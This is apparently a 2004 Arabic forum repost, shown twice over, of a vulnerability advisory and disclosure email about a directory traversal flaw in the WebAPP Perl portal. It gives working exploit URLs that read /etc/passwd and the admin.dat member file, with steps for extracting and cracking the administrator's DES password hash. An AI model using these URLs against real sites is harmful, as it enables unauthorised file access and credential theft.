دعباس
26-08-2004, 01:21
السلام عليكم
تاريخ الصدور :Aug 25 2004
A vulnerability was reported in WebAPP. A remote user can view files on the target system that are located outside of the web document directory.
'index.cgi'
Jerome Athias reported that the 'index.cgi' script does not properly validate user-supplied input in the 'viewcat' variable. A remote user can supply a specially crafted URL containing '../' directory traversal characters to view files on the target system with the privileges of the web service.
A demonstration exploit URL is provided:
http://[target]/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd% 00
A remote user can exploit this flaw to view the 'db/members/admin.dat' file to obtain the administrator's hashed password. Individual user '.dat' files can also be obtained from the 'db/members/' directory.
Impact: A remote user can view files on the target system, including database files that contain hashed passwords for the application.
راجع المورد لحل الثغره
www.web-app.org
او نعطيك الحل
http://www.3asfh.net/vb/images/icons/icon10.gif
_ شرح تفصيلي من مكتشف الثغره
Date: 24 Aug 2004 15:42:51 -0000
From: "J r me" ATHIAS <jerome.athias@caramail.com>
Subject: WebAPP directory traversal and ability to retrieve the DES
WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :
-Easy to Install on standard Unix servers!
(Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source
Several user mods are also available which ranges from chat
to e-commerce applications.
Several vulnerabilities in these mods have already been
discovered.
The WebAPP system itself has a serious reverse directory
traversal vulnerability.
Example..
1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/
2) Click on Articles on the main menu at the left side of
the screen
3) Click on any of the icons representing the misc topics
available /i chose the "bugs" section/
4) You'll wind up with the url "http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs"
on the address bar on your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"
5)View the html source for the page
A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"
View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"></a></td>
"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it
Every user would have a corresponding .dat file within the
db/members directory
PhTeam Release
Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball
احب اقول للسكربت كيدز للينقل مواضيع وبدون اسم الكاتب ويحاول انه يختلق حزازيات بين الناس مالها داعي .. ترا راس مالك php ........قال linux قال http://www.3asfh.net/vb/images/icons/icon10.gif
على قوله بلاك هنتر .الله يذكره بالخير. اطفالنا اكبادنا http://www.3asfh.net/vb/images/icons/icon10.gif
اخوكم دعباس
:::: العاصفة :::::
تاريخ الصدور :Aug 25 2004
A vulnerability was reported in WebAPP. A remote user can view files on the target system that are located outside of the web document directory.
'index.cgi'
Jerome Athias reported that the 'index.cgi' script does not properly validate user-supplied input in the 'viewcat' variable. A remote user can supply a specially crafted URL containing '../' directory traversal characters to view files on the target system with the privileges of the web service.
A demonstration exploit URL is provided:
http://[target]/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd% 00
A remote user can exploit this flaw to view the 'db/members/admin.dat' file to obtain the administrator's hashed password. Individual user '.dat' files can also be obtained from the 'db/members/' directory.
Impact: A remote user can view files on the target system, including database files that contain hashed passwords for the application.
راجع المورد لحل الثغره
www.web-app.org
او نعطيك الحل
http://www.3asfh.net/vb/images/icons/icon10.gif
_ شرح تفصيلي من مكتشف الثغره
Date: 24 Aug 2004 15:42:51 -0000
From: "J r me" ATHIAS <jerome.athias@caramail.com>
Subject: WebAPP directory traversal and ability to retrieve the DES
WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :
-Easy to Install on standard Unix servers!
(Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source
Several user mods are also available which ranges from chat
to e-commerce applications.
Several vulnerabilities in these mods have already been
discovered.
The WebAPP system itself has a serious reverse directory
traversal vulnerability.
Example..
1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/
2) Click on Articles on the main menu at the left side of
the screen
3) Click on any of the icons representing the misc topics
available /i chose the "bugs" section/
4) You'll wind up with the url "http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs"
on the address bar on your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"
5)View the html source for the page
A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"
View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"></a></td>
"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it
Every user would have a corresponding .dat file within the
db/members directory
PhTeam Release
Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball
احب اقول للسكربت كيدز للينقل مواضيع وبدون اسم الكاتب ويحاول انه يختلق حزازيات بين الناس مالها داعي .. ترا راس مالك php ........قال linux قال http://www.3asfh.net/vb/images/icons/icon10.gif
على قوله بلاك هنتر .الله يذكره بالخير. اطفالنا اكبادنا http://www.3asfh.net/vb/images/icons/icon10.gif
اخوكم دعباس
:::: العاصفة :::::